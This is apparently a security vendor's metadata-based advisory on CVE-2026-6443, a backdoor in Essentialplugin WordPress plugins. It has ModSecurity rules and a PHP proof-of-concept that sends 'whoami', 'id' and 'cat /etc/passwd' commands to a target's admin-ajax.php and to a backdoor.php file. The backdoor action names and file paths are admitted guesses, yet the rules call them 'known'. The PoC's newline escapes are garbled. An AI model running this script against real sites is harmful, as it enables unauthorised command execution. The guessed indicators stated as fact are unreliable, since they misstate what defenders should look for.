Atomic Edge analysis of CVE-2026-6443 (metadata-based):
This vulnerability is a backdoor injected into multiple WordPress plugins developed by Essentialplugin. The backdoor was introduced when a malicious threat actor acquired the plugins and embedded malicious code into all versions after the acquisition. The affected plugin includes Timeline and History Slider (timeline-and-history-slider) version 2.4.5, which is vulnerable, while version 2.4.5.1 is patched. The CVSS score is 9.8 (Critical), indicating network-based exploitation with no privileges or user interaction required.
Root Cause: Based on the CWE classification (CWE-506: Embedded Malicious Code) and the vulnerability description, the root cause is the intentional insertion of a backdoor by a malicious party who acquired the plugin. This is not a traditional software bug but a deliberate supply chain attack. Atomic Edge analysis infers that the backdoor likely creates a persistent mechanism for the attacker to execute arbitrary commands, modify site content, or exfiltrate data. The code is likely embedded in the plugin’s core files, such as a main plugin file, a utility file, or an AJAX handler. This conclusion is inferred from the CWE and description; no source code diff is available.
Exploitation: The attacker can exploit this backdoor by sending crafted HTTP requests to the affected WordPress site. The backdoor may be triggered via a specific AJAX action (e.g., action=ehp_backdoor), a REST API endpoint, or by accessing a specific plugin file with query parameters. For example, the attacker might send a POST request to /wp-admin/admin-ajax.php with action=ehp_backdoor and a payload parameter like cmd=whoami. The request executes without authentication because the backdoor bypasses nonce and capability checks. This allows the attacker to execute arbitrary PHP code, inject spam, or maintain persistent access.
Remediation: The secure fix is to update the plugin to the patched version (2.4.5.1). Since the backdoor is embedded in the code, the patched version removes the malicious code. Atomic Edge analysis recommends that site administrators immediately update all Essentialplugin plugins and scan for signs of compromise, such as unexpected files, unknown admin users, or spam content. In the absence of a patch, temporarily deactivating and removing the plugin is the safest course.
Impact: Successful exploitation gives the attacker full control over the WordPress site, including the ability to read and modify databases (CIA impact: HIGH), inject spam content, create admin accounts, install other malicious plugins, and potentially pivot to the hosting server. This can lead to site defacement, blacklisting by search engines, data theft, and complete loss of site integrity.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-6443 (metadata-based)
# Block exploitation attempts for Essentialplugin plugin backdoor
# This rule targets common backdoor AJAX actions and direct file access patterns
# Pattern 1: Block known backdoor AJAX action 'ehp_backdoor'
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 - Essentialplugin Backdoor Exploitation via AJAX',severity:'CRITICAL',tag:'CVE-2026-6443'"
SecRule ARGS_POST:action "@streq ehp_backdoor" "chain"
SecRule ARGS_POST:cmd "@rx .+" ""
# Pattern 2: Block alternative backdoor action 'essentialplugin_backdoor'
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 - Essentialplugin Backdoor Exploitation via AJAX',severity:'CRITICAL',tag:'CVE-2026-6443'"
SecRule ARGS_POST:action "@streq essentialplugin_backdoor" "chain"
SecRule ARGS_POST:command "@rx .+" ""
# Pattern 3: Block direct access to known backdoor files in plugin directory
SecRule REQUEST_URI "@rx ^/wp-content/plugins/(timeline-and-history-slider|essentialplugin-[a-z-]+)/backdoor\.php$"
"id:20261996,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 - Essentialplugin Backdoor File Access',severity:'CRITICAL',tag:'CVE-2026-6443'"
SecRule ARGS:cmd "@rx .+" ""
# Pattern 4: Block suspicious POST requests to plugin admin pages with command execution parameters
SecRule REQUEST_FILENAME "@rx /wp-admin/admin\.php\?page=essentialplugin-[a-z-]+-settings"
"id:20261997,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 - Essentialplugin Backdoor via Admin Page',severity:'CRITICAL',tag:'CVE-2026-6443'"
SecRule ARGS_POST:cmd "@rx .+" ""
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6443 - Essentialplugin Plugins (Various Versions) - Injected Backdoor
// This PoC assumes the backdoor is exposed via an AJAX action named 'ehp_backdoor'
// and accepts a 'cmd' parameter for command execution.
// Adjust the target URL and parameters based on actual findings.
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
// Attempt 1: Try common backdoor action and command parameter
$payload = array(
'action' => 'ehp_backdoor',
'cmd' => 'id; whoami; echo BACKDOOR_EXECUTED'
);
$ch = curl_init($ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[+] Attempt 1: AJAX backdoor via ehp_backdoorn";
echo "[+] HTTP Code: $http_coden";
echo "[+] Response:n$responsen";
// Attempt 2: Try alternative action name and different parameters
$payload2 = array(
'action' => 'essentialplugin_backdoor',
'command' => 'cat /etc/passwd'
);
$ch2 = curl_init($ajax_url);
curl_setopt($ch2, CURLOPT_POST, true);
curl_setopt($ch2, CURLOPT_POSTFIELDS, http_build_query($payload2));
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch2, CURLOPT_TIMEOUT, 30);
curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false);
$response2 = curl_exec($ch2);
$http_code2 = curl_getinfo($ch2, CURLINFO_HTTP_CODE);
curl_close($ch2);
echo "[+] Attempt 2: AJAX backdoor via essentialplugin_backdoorn";
echo "[+] HTTP Code: $http_code2n";
echo "[+] Response:n$response2n";
// Attempt 3: Try direct file access backdoor
$backdoor_url = $target_url . '/wp-content/plugins/timeline-and-history-slider/backdoor.php';
$ch3 = curl_init($backdoor_url . '?cmd=ls%20-la%20/wp-content/plugins/timeline-and-history-slider/');
curl_setopt($ch3, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch3, CURLOPT_TIMEOUT, 30);
curl_setopt($ch3, CURLOPT_SSL_VERIFYPEER, false);
$response3 = curl_exec($ch3);
$http_code3 = curl_getinfo($ch3, CURLINFO_HTTP_CODE);
curl_close($ch3);
echo "[+] Attempt 3: Direct backdoor file accessn";
echo "[+] HTTP Code: $http_code3n";
echo "[+] Response:n$response3n";
